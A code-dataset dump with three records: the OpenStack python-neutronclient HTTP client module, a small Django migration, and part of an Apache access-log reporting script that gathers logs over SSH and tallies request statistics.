code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
# Copyright 2012 OpenStack Foundation.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import logging
import os
import debtcollector.renames
from keystoneauth1 import access
from keystoneauth1 import adapter
from oslo_serialization import jsonutils
from oslo_utils import importutils
import requests
from neutronclient._i18n import _
from neutronclient.common import exceptions
from neutronclient.common import utils
osprofiler_web = importutils.try_import("osprofiler.web")
_logger = logging.getLogger(__name__)
if os.environ.get('NEUTRONCLIENT_DEBUG'):
ch = logging.StreamHandler()
_logger.setLevel(logging.DEBUG)
_logger.addHandler(ch)
_requests_log_level = logging.DEBUG
else:
_requests_log_level = logging.WARNING
logging.getLogger("requests").setLevel(_requests_log_level)
MAX_URI_LEN = 8192
USER_AGENT = 'python-neutronclient'
REQ_ID_HEADER = 'X-OpenStack-Request-ID'
class HTTPClient(object):
"""Handles the REST calls and responses, include authn."""
CONTENT_TYPE = 'application/json'
@debtcollector.renames.renamed_kwarg(
'tenant_id', 'project_id', replace=True)
@debtcollector.renames.renamed_kwarg(
'tenant_name', 'project_name', replace=True)
def __init__(self, username=None, user_id=None,
project_name=None, project_id=None,
password=None, auth_url=None,
token=None, region_name=None, timeout=None,
endpoint_url=None, insecure=False,
endpoint_type='publicURL',
auth_strategy='keystone', ca_cert=None, cert=None,
log_credentials=False, service_type='network',
global_request_id=None, **kwargs):
self.username = username
self.user_id = user_id
self.project_name = project_name
self.project_id = project_id
self.password = password
self.auth_url = auth_url.rstrip('/') if auth_url else None
self.service_type = service_type
self.endpoint_type = endpoint_type
self.region_name = region_name
self.timeout = timeout
self.auth_token = token
self.auth_tenant_id = None
self.auth_user_id = None
self.endpoint_url = endpoint_url
self.auth_strategy = auth_strategy
self.log_credentials = log_credentials
self.global_request_id = global_request_id
self.cert = cert
if insecure:
self.verify_cert = False
else:
self.verify_cert = ca_cert if ca_cert else True
def _cs_request(self, *args, **kwargs):
kargs = {}
kargs.setdefault('headers', kwargs.get('headers', {}))
kargs['headers']['User-Agent'] = USER_AGENT
if 'body' in kwargs:
kargs['body'] = kwargs['body']
if self.log_credentials:
log_kargs = kargs
else:
log_kargs = self._strip_credentials(kargs)
utils.http_log_req(_logger, args, log_kargs)
try:
resp, body = self.request(*args, **kargs)
except requests.exceptions.SSLError as e:
raise exceptions.SslCertificateValidationError(reason=str(e))
except Exception as e:
# Wrap the low-level connection error (socket timeout, redirect
# limit, decompression error, etc) into our custom high-level
# connection exception (it is excepted in the upper layers of code)
_logger.debug("throwing ConnectionFailed : %s", e)
raise exceptions.ConnectionFailed(reason=str(e))
utils.http_log_resp(_logger, resp, body)
# log request-id for each api call
request_id = resp.headers.get('x-openstack-request-id')
if request_id:
_logger.debug('%(method)s call to neutron for '
'%(url)s used request id '
'%(response_request_id)s',
{'method': resp.request.method,
'url': resp.url,
'response_request_id': request_id})
if resp.status_code == 401:
raise exceptions.Unauthorized(message=body)
return resp, body
def _strip_credentials(self, kwargs):
if kwargs.get('body') and self.password:
log_kwargs = kwargs.copy()
log_kwargs['body'] = kwargs['body'].replace(self.password,
'REDACTED')
return log_kwargs
else:
return kwargs
def authenticate_and_fetch_endpoint_url(self):
if not self.auth_token:
self.authenticate()
elif not self.endpoint_url:
self.endpoint_url = self._get_endpoint_url()
def request(self, url, method, body=None, headers=None, **kwargs):
"""Request without authentication."""
content_type = kwargs.pop('content_type', None) or 'application/json'
headers = headers or {}
headers.setdefault('Accept', content_type)
if body:
headers.setdefault('Content-Type', content_type)
if self.global_request_id:
headers.setdefault(REQ_ID_HEADER, self.global_request_id)
headers['User-Agent'] = USER_AGENT
# NOTE(dbelova): osprofiler_web.get_trace_id_headers does not add any
# headers in case if osprofiler is not initialized.
if osprofiler_web:
headers.update(osprofiler_web.get_trace_id_headers())
resp = requests.request(
method,
url,
data=body,
headers=headers,
verify=self.verify_cert,
cert=self.cert,
timeout=self.timeout,
**kwargs)
return resp, resp.text
def _check_uri_length(self, action):
uri_len = len(self.endpoint_url) + len(action)
if uri_len > MAX_URI_LEN:
raise exceptions.RequestURITooLong(
excess=uri_len - MAX_URI_LEN)
def do_request(self, url, method, **kwargs):
# Ensure client always has correct uri - do not guesstimate anything
self.authenticate_and_fetch_endpoint_url()
self._check_uri_length(url)
# Perform the request once. If we get a 401 back then it
# might be because the auth token expired, so try to
# re-authenticate and try again. If it still fails, bail.
try:
kwargs['headers'] = kwargs.get('headers') or {}
if self.auth_token is None:
self.auth_token = ""
kwargs['headers']['X-Auth-Token'] = self.auth_token
resp, body = self._cs_request(self.endpoint_url + url, method,
**kwargs)
return resp, body
except exceptions.Unauthorized:
self.authenticate()
kwargs['headers'] = kwargs.get('headers') or {}
kwargs['headers']['X-Auth-Token'] = self.auth_token
resp, body = self._cs_request(
self.endpoint_url + url, method, **kwargs)
return resp, body
def _extract_service_catalog(self, body):
"""Set the client's service catalog from the response data."""
self.auth_ref = access.create(body=body)
self.service_catalog = self.auth_ref.service_catalog
self.auth_token = self.auth_ref.auth_token
self.auth_tenant_id = self.auth_ref.tenant_id
self.auth_user_id = self.auth_ref.user_id
if not self.endpoint_url:
self.endpoint_url = self.service_catalog.url_for(
region_name=self.region_name,
service_type=self.service_type,
interface=self.endpoint_type)
def _authenticate_keystone(self):
if self.user_id:
creds = {'userId': self.user_id,
'password': self.password}
else:
creds = {'username': self.username,
'password': self.password}
if self.project_id:
body = {'auth': {'passwordCredentials': creds,
'tenantId': self.project_id, }, }
else:
body = {'auth': {'passwordCredentials': creds,
'tenantName': self.project_name, }, }
if self.auth_url is None:
raise exceptions.NoAuthURLProvided()
token_url = self.auth_url + "/tokens"
resp, resp_body = self._cs_request(token_url, "POST",
body=jsonutils.dumps(body),
content_type="application/json",
allow_redirects=True)
if resp.status_code != 200:
raise exceptions.Unauthorized(message=resp_body)
if resp_body:
try:
resp_body = jsonutils.loads(resp_body)
except ValueError:
pass
else:
resp_body = None
self._extract_service_catalog(resp_body)
def _authenticate_noauth(self):
if not self.endpoint_url:
message = _('For "noauth" authentication strategy, the endpoint '
'must be specified either in the constructor or '
'using --os-url')
raise exceptions.Unauthorized(message=message)
def authenticate(self):
if self.auth_strategy == 'keystone':
self._authenticate_keystone()
elif self.auth_strategy == 'noauth':
self._authenticate_noauth()
else:
err_msg = _('Unknown auth strategy: %s') % self.auth_strategy
raise exceptions.Unauthorized(message=err_msg)
def _get_endpoint_url(self):
if self.auth_url is None:
raise exceptions.NoAuthURLProvided()
url = self.auth_url + '/tokens/%s/endpoints' % self.auth_token
try:
resp, body = self._cs_request(url, "GET")
except exceptions.Unauthorized:
# rollback to authenticate() to handle case when neutron client
# is initialized just before the token is expired
self.authenticate()
return self.endpoint_url
body = jsonutils.loads(body)
for endpoint in body.get('endpoints', []):
if (endpoint['type'] == 'network' and
endpoint.get('region') == self.region_name):
if self.endpoint_type not in endpoint:
raise exceptions.EndpointTypeNotFound(
type_=self.endpoint_type)
return endpoint[self.endpoint_type]
raise exceptions.EndpointNotFound()
def get_auth_info(self):
return {'auth_token': self.auth_token,
'auth_tenant_id': self.auth_tenant_id,
'auth_user_id': self.auth_user_id,
'endpoint_url': self.endpoint_url}
def get_auth_ref(self):
return getattr(self, 'auth_ref', None)
class SessionClient(adapter.Adapter):
def request(self, *args, **kwargs):
kwargs.setdefault('authenticated', False)
kwargs.setdefault('raise_exc', False)
content_type = kwargs.pop('content_type', None) or 'application/json'
headers = kwargs.get('headers') or {}
headers.setdefault('Accept', content_type)
# NOTE(dbelova): osprofiler_web.get_trace_id_headers does not add any
# headers in case if osprofiler is not initialized.
if osprofiler_web:
headers.update(osprofiler_web.get_trace_id_headers())
try:
kwargs.setdefault('data', kwargs.pop('body'))
except KeyError:
pass
if kwargs.get('data'):
headers.setdefault('Content-Type', content_type)
kwargs['headers'] = headers
resp = super(SessionClient, self).request(*args, **kwargs)
return resp, resp.text
def _check_uri_length(self, url):
uri_len = len(self.endpoint_url) + len(url)
if uri_len > MAX_URI_LEN:
raise exceptions.RequestURITooLong(
excess=uri_len - MAX_URI_LEN)
def do_request(self, url, method, **kwargs):
kwargs.setdefault('authenticated', True)
self._check_uri_length(url)
return self.request(url, method, **kwargs)
@property
def endpoint_url(self):
# NOTE(jamielennox): This is used purely by the CLI and should be
# removed when the CLI gets smarter.
return self.get_endpoint()
@property
def auth_token(self):
# NOTE(jamielennox): This is used purely by the CLI and should be
# removed when the CLI gets smarter.
return self.get_token()
def authenticate(self):
# NOTE(jamielennox): This is used purely by the CLI and should be
# removed when the CLI gets smarter.
self.get_token()
def get_auth_info(self):
auth_info = {'auth_token': self.auth_token,
'endpoint_url': self.endpoint_url}
# NOTE(jamielennox): This is the best we can do here. It will work
# with identity plugins which is the primary case but we should
# deprecate it's usage as much as possible.
try:
get_access = (self.auth or self.session.auth).get_access
except AttributeError:
pass
else:
auth_ref = get_access(self.session)
auth_info['auth_tenant_id'] = auth_ref.project_id
auth_info['auth_user_id'] = auth_ref.user_id
return auth_info
def get_auth_ref(self):
return self.session.auth.get_auth_ref(self.session)
# FIXME(bklei): Should refactor this to use kwargs and only
# explicitly list arguments that are not None.
@debtcollector.renames.renamed_kwarg('tenant_id', 'project_id', replace=True)
@debtcollector.renames.renamed_kwarg(
'tenant_name', 'project_name', replace=True)
def construct_http_client(username=None,
user_id=None,
project_name=None,
project_id=None,
password=None,
auth_url=None,
token=None,
region_name=None,
timeout=None,
endpoint_url=None,
insecure=False,
endpoint_type='public',
log_credentials=None,
auth_strategy='keystone',
ca_cert=None,
cert=None,
service_type='network',
session=None,
global_request_id=None,
**kwargs):
if session:
kwargs.setdefault('user_agent', USER_AGENT)
kwargs.setdefault('interface', endpoint_type)
return SessionClient(session=session,
service_type=service_type,
region_name=region_name,
global_request_id=global_request_id,
**kwargs)
else:
# FIXME(bklei): username and password are now optional. Need
# to test that they were provided in this mode. Should also
# refactor to use kwargs.
return HTTPClient(username=username,
password=password,
project_id=project_id,
project_name=project_name,
user_id=user_id,
auth_url=auth_url,
token=token,
endpoint_url=endpoint_url,
insecure=insecure,
timeout=timeout,
region_name=region_name,
endpoint_type=endpoint_type,
service_type=service_type,
ca_cert=ca_cert,
cert=cert,
log_credentials=log_credentials,
auth_strategy=auth_strategy,
global_request_id=global_request_id)
| openstack/python-neutronclient | neutronclient/client.py | Python | apache-2.0 | 16,747 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-02-04 13:06
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('team', '0003_auto_20170128_1404'),
]
operations = [
migrations.RemoveField(
model_name='player',
name='active',
),
]
| vollov/lotad | team/migrations/0004_remove_player_active.py | Python | mit | 388 |
#!/usr/bin/python
#######################################################################
#
# Analysing Apache log files to get some general insights about the accessablility of a web application
#
# Author: Ahmed ElShafei [elshafei.ah@gmail.com]
#
# NOTE: consider changing the constants in the conf.py file
#
# Description:
# This is a Python script is meant to fetch Apache access log files of an enviroment to get
# an overall staus of web accessability of an online application. It can be run as a cronjob, also, it can be run manually
# by running ./al2r.py .
#
# Change log:
# 08.03.2016 Ahmed ElShafei Script re-created
#
#######################################################################
#Let's Play
##################################################
# Section 00. Importing Python Libraries #
##################################################
import sys
import os
import time
import shutil
import re
import datetime
import collections
import operator
import pprint
import csv
import math
import commands
import smtplib
import getpass
import socket
##################################################
# Section 01. DEFINIONS #
##################################################
# for modularity, configuration is set in seprate file and other helper classes as well, We're going to import it as modules
from conf import *
from ssh import *
from helpers import *
from ua_parser import user_agent_parser
# computing reference time to discard log lines older than that time based on PERIOD value
START_DATE = datetime.datetime.now()
period_args = ''.join(conf.PERIOD.split())
period_measure = period_args[-1].lower()
period_val = period_args[0:-1]
if not period_measure in ('h', 'd', 'm'):
print('\t' + bcolors.FAIL + 'Not valid PERIOD measure unit, please use either m for minutes, h for hours or d for days' + bcolors.ENDC)
exit(1)
#check if period value is valid
try:
period_val = int(period_val)
if period_val < 1 :
print('\t' + bcolors.FAIL + 'Not valid PERIOD value, please set positive number value ' + bcolors.ENDC)
exit(1)
except Exception:
print('\t' + bcolors.FAIL + 'Not valid PERIOD value, please set value in numbers' + bcolors.ENDC)
exit(1)
if period_measure == 'h':
dt_ref = START_DATE - datetime.timedelta(hours=period_val)
elif period_measure == 'm':
dt_ref = START_DATE - datetime.timedelta(minutes=period_val)
else:
dt_ref = START_DATE - datetime.timedelta(days=period_val)
#print dt_ref
##################################################
# Section 02. INTIALIZATION #
##################################################
print(' * Intializing ....\n')
# Check if the Tempraroy directory exist, otherwise create it
print(' * checking temporary directory ....')
if not os.path.exists(TEMP_DIR):
print('\t Tempraroy directory not found, creating into ' + TEMP_DIR)
os.makedirs(TEMP_DIR)
print('\t .. ' + bcolors.OKGREEN + 'DONE' + bcolors.ENDC + '\n')
else:
print('\t Tempraroy directory at ' + TEMP_DIR + ' already exists\n')
# check whether log files to be remotely searched or locally
print(' * check whether log files to be remotely searched or locally')
if REMOTE:
print('\t Files to be searched remotely\n')
#check if Hosts is SSH accessable
sshSessions = [] # a list of SSH sessions to be intitiated
print(' * check if Hosts is accessable normally !')
for hostname in HOSTNAMES:
sshSession = SSH(hostname, '', USERNAME, 22)
sshSessions.append( sshSession )
result = sshSession.cmd('echo Ok')
if 'Ok' in result:
print('\t ' + hostname + ' can be accessed successfully')
else:
print('\t' + 'Error accessing ' + hostname )
exit(1)
print('\n')
else:
print('\t Files to be searched locally\n')
# getting log files into the temporary directory
if REMOTE:
print(' * getting log files from remote servers')
for sshSession in sshSessions:
#getting the list of files to be copied from the remote log directory
#generating the placeholder of time frame in oder to be append in find command
period_placeholder = calculate_period()
logfiles = sshSession.cmd('find ' + DIRECTORY.replace(" ", "") + '/* ' + period_placeholder + ' | grep ' + COMMON_LOGFILE_NAME)
logfiles_list = logfiles.split()
print('\t' + str(len(logfiles_list)) + ' log files found in ' + sshSession.ip + '\n')
if len(logfiles_list):
for logfile in logfiles_list:
scp_output = sshSession.pull(logfile, TEMP_DIR)
if '100%' in scp_output:
print('\t' + logfile + ' successfully copied from ' + sshSession.ip + ' to ' + TEMP_DIR + '\n')
else:
print('\t Error coping' + logfile + ' from ' + sshSession.ip + '\n')
exit(1)
print('\t ... DONE')
print('\n')
else:
print(' * getting files from local server')
#calculating second based on PERIOD configuration
period_placeholder = calculate_period()
past = time.time() - period_placeholder
logfiles = []
for p, ds, fs in os.walk(DIRECTORY):
for fn in fs:
filepath = os.path.join(p, fn)
if os.path.getmtime(filepath) >= past and COMMON_LOGFILE_NAME in filepath :
logfiles.append(filepath)
print ('\t ' + str(len(logfiles)) + ' files found in the local directory ')
for logfile in logfiles:
shutil.copy2(logfile, TEMP_DIR)
print ('\t' + logfile + ' copied to ' + TEMP_DIR)
print('\n')
#loading IP Gelolaction DB
ip_geo_db_f = open(IP_COUNTRY_DB)
csvReader = csv.reader(ip_geo_db_f)
ip_geo_db_data = list(csvReader)
#print(ip_geo_db_data[0])
##################################################
# Section 03. Reading logfiles #
##################################################
TOKEN_POS = {} #dictionary of apache access log tokens position in log line based on LOGFORMAT value
LFS = LOGFORMAT.split('\"')
#getting token positions in log lines
for i,v in TOKEN_DICT.items():
#print( i )
TOKEN_POS.update({i : [LFS.index(s) for s in LFS if i in s]})
if i == LFS[TOKEN_POS[i][0]]:
TOKEN_POS[i].append(-1)
else:
TOKEN_POS[i].append(LFS[TOKEN_POS[i][0]].split().index(i))
#print( TOKEN_POS[i] )
logs = [] #this list will hold the log lines
print(' * reading log files ..')
#loading log line from log giles
for log_file in os.listdir(TEMP_DIR):
#print log_file
log_file_path = os.path.join(TEMP_DIR, log_file)
if os.path.isfile(log_file_path):
for line in open(log_file_path, 'r').readlines():
#print line
if len(line) > 0:
LLS = re.sub(r'\[.+?\]', lambda x:x.group().replace(" ","_"), line.rstrip()).split('"')
line_details = {}
for i,v in TOKEN_POS.items():
if v[1] == -1:
line_details.update({TOKEN_DICT[i]: LLS[v[0]]})
else:
line_details.update({TOKEN_DICT[i]: LLS[v[0]].split()[v[1]]})
line_details['time_stamp'] = time.strptime(line_details['time_stamp'][1:-1].split('_')[0], '%d/%b/%Y:%H:%M:%S')
line_details.update({'user_agent_details' : user_agent_parser.Parse(line_details['user_agent']) })
line_details.update({'log_file': log_file})
#filter odd log line. ex: 84.3.41.146 - - [03/Feb/2016:12:00:14 +0100] "-" 408 - "-" "-" 7
if datetime.datetime(*line_details['time_stamp'][0:6]) > dt_ref and not ( line_details['user_agent'] == '-' and line_details['request_line'] == '-' and line_details['response_size'] == '-'):
logs.append(line_details)
#pprint.pprint( logs[0] )
#print( len(logs) )
print ('\t ' + str(len(logs)) + ' log lines loaded ..\n')
##################################################
# Section 04. Processing logs #
##################################################
print(' * processing logs ..')
for log in logs:
#counting status codes occurrence
if log['status'] in HTTP_STATUS_CODE_OCCUR.keys():
HTTP_STATUS_CODE_OCCUR[log['status']] += 1
#getting most referring URLs
if log['referer_url'] !='-':
if log['referer_url'] in MOST_REFERING_URLS.keys():
MOST_REFERING_URLS[log['referer_url']] += 1
else:
MOST_REFERING_URLS.update({log['referer_url'] : 1 })
#calculating most requested ips
if log['remote_host'] in MOST_REQUESTING_IPs.keys():
MOST_REQUESTING_IPs[log['remote_host']] += 1
else:
MOST_REQUESTING_IPs.update({ log['remote_host'] : 1 })
#calculating most requested URLS
if log['request_line'].split()[1] in MOST_REQUESTING_URLS.keys():
MOST_REQUESTING_URLS[log['request_line'].split()[1]] += 1
else:
MOST_REQUESTING_URLS.update({ log['request_line'].split()[1] : 1 })
# getting longest response size and Time taken to server the URL
if log['request_line'].split()[1] in LONGEST_URL_RESPONSE_TIME.keys():
if int(log['response_time']) > LONGEST_URL_RESPONSE_TIME[log['request_line'].split()[1]]:
LONGEST_URL_RESPONSE_TIME[log['request_line'].split()[1]] = int(log['response_time'])
else:
LONGEST_URL_RESPONSE_TIME.update({ log['request_line'].split()[1] : int(log['response_time']) })
# getting largest response size
if log['response_size'] != '-':
if log['request_line'].split()[1] in LARGEST_URL_RESPONSE_SIZE.keys():
if int(log['response_size']) > LARGEST_URL_RESPONSE_SIZE[log['request_line'].split()[1]]:
LARGEST_URL_RESPONSE_SIZE[log['request_line'].split()[1]] = int(log['response_size'])
else:
LARGEST_URL_RESPONSE_SIZE.update({ log['request_line'].split()[1] : int(log['response_size']) })
#getting Most reuesting Clients
if log['user_agent_details']['user_agent']['family'] != 'Other':
if log['user_agent_details']['user_agent']['family'] in MOST_REQUESTING_CLIENTS.keys():
MOST_REQUESTING_CLIENTS[log['user_agent_details']['user_agent']['family']] += 1
else:
MOST_REQUESTING_CLIENTS.update({ log['user_agent_details']['user_agent']['family'] : 1 })
else:
if log['user_agent_details']['string'].split()[0].split('/')[0] in MOST_REQUESTING_CLIENTS.keys():
MOST_REQUESTING_CLIENTS[log['user_agent_details']['string'].split()[0].split('/')[0]] += 1
else:
MOST_REQUESTING_CLIENTS.update({ log['user_agent_details']['string'].split()[0].split('/')[0] : 1})
#getting Most reuesting OS
if log['user_agent_details']['os']['family'] != 'Other':
if log['user_agent_details']['os']['family'] in MOST_REQUESTING_OS.keys():
MOST_REQUESTING_OS[log['user_agent_details']['os']['family']] += 1
else:
MOST_REQUESTING_OS.update({ log['user_agent_details']['os']['family'] : 1 })
else:
if len(log['user_agent_details']['string'].split()) > 2:
log_ua_os = log['user_agent_details']['string'].split()[1][1:-1]
if log_ua_os in MOST_REQUESTING_OS.keys():
MOST_REQUESTING_OS[log_ua_os] += 1
else:
MOST_REQUESTING_OS.update({ log_ua_os : 1})
#count HTTP methods
log_method = log['request_line'].split()[0]
if log_method in HTTP_METHODS_COUNT.keys():
HTTP_METHODS_COUNT[log_method] += 1
#Calaculating most requesting counteries
for k,v in MOST_REQUESTING_IPs.items():
#print(k)
ip_vals = k.split('.')
ip_number = int(ip_vals[0]) * 16777216 + int(ip_vals[1]) * 65536 + int(ip_vals[2]) * 256 + int(ip_vals[3])
for ip_range in ip_geo_db_data:
if ip_number >= int(ip_range[0]) and ip_number <= int(ip_range[1]):
if ip_range[3] == '-':
country_val = 'Private (VPN)'
else
country_val = ip_range[3] + ' (' + ip_range[2] + ')'
break
if country_val in TOP_REQUESTING_COUNTERIES.keys():
TOP_REQUESTING_COUNTERIES[country_val] += v
else:
TOP_REQUESTING_COUNTERIES.update({country_val : v })
print('\t Peocessing done, formatting for printing ..\n\n')
##################################################
# Section 05. Report formatting #
##################################################
#
#test
#
if SEND_EMAIL:
__HTTP_STATUS_CODES_ROWS = ''
__HTTP_REQUEST_TYPES_ROWS = ''
__TOP_REQUESTING_IPS_ROWS = ''
__TOP_REQUESTING_CLIENTS_ROWS = ''
__TOP_REQUESTING_OSS_ROWS = ''
__TOP_REQUESTING_COUNTRIES_ROWS = ''
__TOP_REQUESTED_URLS_ROWS = ''
__TOP_REFERER_ULS_ROWS = ''
__LONGEST_RESPONSE_TIME_URLS_ROWS = ''
__LARGEST_RESPONSE_SIZE_URLS_ROWS = ''
EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__ENVIRONMENT', ENVIRONMENT)
EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__PERIOD_FRAME', PERIOD )
EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__START_DATE', START_DATE.strftime("%Y-%m-%d %H:%M:%S"))
EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__FROM_EMAIL', getpass.getuser() + '@' + socket.gethostname())
EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__TO_EMAILS', ', '.join(TO_EMAILS) )
EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__SUBJECT', ENVIRONMENT + ' | a2lr ')
#printing http status
print(bcolors.HEADER + 'HHTP Status codes' + bcolors.ENDC)
for i,v in sorted(HTTP_STATUS_CODE_OCCUR.items(), key=operator.itemgetter(0)):
#for i,v in collections.OrderedDict(sorted(HTTP_STATUS_CODE_OCCUR.items())).items():
if v > 0:
print( ' ' + i + ' : ' + str(v) )
if SEND_EMAIL:
__HTTP_STATUS_CODES_ROWS += ('<tr>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ i +
' </td>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ str(v) +
' </td>\n'
'</tr>\n'
)
print('\n')
#printing http methods
print(bcolors.HEADER + 'HHTP Methods' + bcolors.ENDC)
for i,v in HTTP_METHODS_COUNT.items():
if v > 0:
print( ' ' + i + ' : ' + str(v) )
if SEND_EMAIL:
__HTTP_REQUEST_TYPES_ROWS += ('<tr>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ i +
' </td>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ str(v) +
' </td>\n'
'</tr>\n'
)
print('\n')
#most requesting ips
print(bcolors.HEADER + 'Most Requesting IPs' + bcolors.ENDC)
for i,v in sorted(MOST_REQUESTING_IPs.items(), key=operator.itemgetter(1), reverse=True)[:10]:
print( ' ' + i + ' : ' + str(v) + ' times' )
if SEND_EMAIL:
__TOP_REQUESTING_IPS_ROWS += ('<tr>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ i +
' </td>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ str(v) +
' </td>\n'
'</tr>\n'
)
print('\n')
#printing most requesting clients
print(bcolors.HEADER + 'Most requesting clients' + bcolors.ENDC)
for i,v in sorted(MOST_REQUESTING_CLIENTS.items(), key=operator.itemgetter(1), reverse=True)[:10]:
if i != '-':
print( ' ' + i + ' : ' + str(v) + ' times' )
if SEND_EMAIL:
__TOP_REQUESTING_CLIENTS_ROWS += ('<tr>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ i +
' </td>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ str(v) +
' </td>\n'
'</tr>\n'
)
print('\n')
#printing most requesting OSs
print(bcolors.HEADER + 'Most Requesting OSs' + bcolors.ENDC)
for i,v in sorted(MOST_REQUESTING_OS.items(), key=operator.itemgetter(1), reverse=True)[:10]:
print( ' ' + i + ' : ' + str(v) + ' times' )
if SEND_EMAIL:
__TOP_REQUESTING_OSS_ROWS += ('<tr>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ i +
' </td>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ str(v) +
' </td>\n'
'</tr>\n'
)
print('\n')
#printing Top requesting Countries
print(bcolors.HEADER + 'Top requesting Countries' + bcolors.ENDC)
for i,v in sorted(TOP_REQUESTING_COUNTERIES.items(), key=operator.itemgetter(1), reverse=True)[:10]:
print( ' ' + i + ' : ' + str(v) + ' times' )
if SEND_EMAIL:
__TOP_REQUESTING_COUNTRIES_ROWS += ('<tr>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ i +
' </td>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ str(v) +
' </td>\n'
'</tr>\n'
)
print('\n')
#printing most requesting URLS
print(bcolors.HEADER + 'Most requesting URLs' + bcolors.ENDC)
for i,v in sorted(MOST_REQUESTING_URLS.items(), key=operator.itemgetter(1), reverse=True)[:10]:
print( ' ' + i + ' : ' + str(v) + ' times' )
if SEND_EMAIL:
__TOP_REQUESTED_URLS_ROWS += ('<tr>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ i +
' </td>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ str(v) +
' </td>\n'
'</tr>\n'
)
print('\n')
#printing most referering URLs
print(bcolors.HEADER + 'Most referering URLs' + bcolors.ENDC)
for i,v in sorted(MOST_REFERING_URLS.items(), key=operator.itemgetter(1), reverse=True)[:10]:
print( ' ' + i + ' : ' + str(v) + ' times' )
if SEND_EMAIL:
__TOP_REFERER_ULS_ROWS += ('<tr>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ i +
' </td>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ str(v) +
' </td>\n'
'</tr>\n'
)
print('\n')
#printing Longest resonse time
print(bcolors.HEADER + 'Longest respone time' + bcolors.ENDC)
for i,v in sorted(LONGEST_URL_RESPONSE_TIME.items(), key=operator.itemgetter(1), reverse=True)[:10]:
if v > 0:
log_time_string = ''
if v / 1000000 > 60 :
log_time_string = str(v / 60000000 ) + ' mins'
arb = (v % 60000000) / 1000000
if arb > 0 :
log_time_string += ' , ' + str(arb) + ' secs'
else:
log_time_string = str( v / 1000000) + ' seconds '
print( ' ' + i + ' : ' + log_time_string)
if SEND_EMAIL:
__LONGEST_RESPONSE_TIME_URLS_ROWS += ('<tr>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ i +
' </td>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ log_time_string +
' </td>\n'
'</tr>\n'
)
print('\n')
#printing Largest resonse size
print(bcolors.HEADER + 'Largest respone size' + bcolors.ENDC)
for k,v in sorted(LARGEST_URL_RESPONSE_SIZE.items(), key=operator.itemgetter(1), reverse=True)[:10]:
if v > 0:
v = v / 1024
size_name = ("KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(v,1024)))
p = math.pow(1024,i)
s = round(v/p,2)
response_size_str = str(s) + str(size_name[i])
print( ' ' + k + ' : ' + response_size_str )
if SEND_EMAIL:
__LARGEST_RESPONSE_SIZE_URLS_ROWS += ('<tr>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ k +
' </td>\n'
'<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'
+ response_size_str +
' </td>\n'
'</tr>\n'
)
print('\n')
if SEND_EMAIL:
EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__HTTP_STATUS_CODES_ROWS', __HTTP_STATUS_CODES_ROWS)
EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__HTTP_REQUEST_TYPES_ROWS', __HTTP_REQUEST_TYPES_ROWS)
EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__TOP_REQUESTING_IPS_ROWS', __TOP_REQUESTING_IPS_ROWS)
EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__TOP_REQUESTING_CLIENTS_ROWS', __TOP_REQUESTING_CLIENTS_ROWS)
EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__TOP_REQUESTING_OSS_ROWS', __TOP_REQUESTING_OSS_ROWS)
EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__TOP_REQUESTING_COUNTRIES_ROWS', __TOP_REQUESTING_COUNTRIES_ROWS)
EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__TOP_REQUESTED_URLS_ROWS', __TOP_REQUESTED_URLS_ROWS)
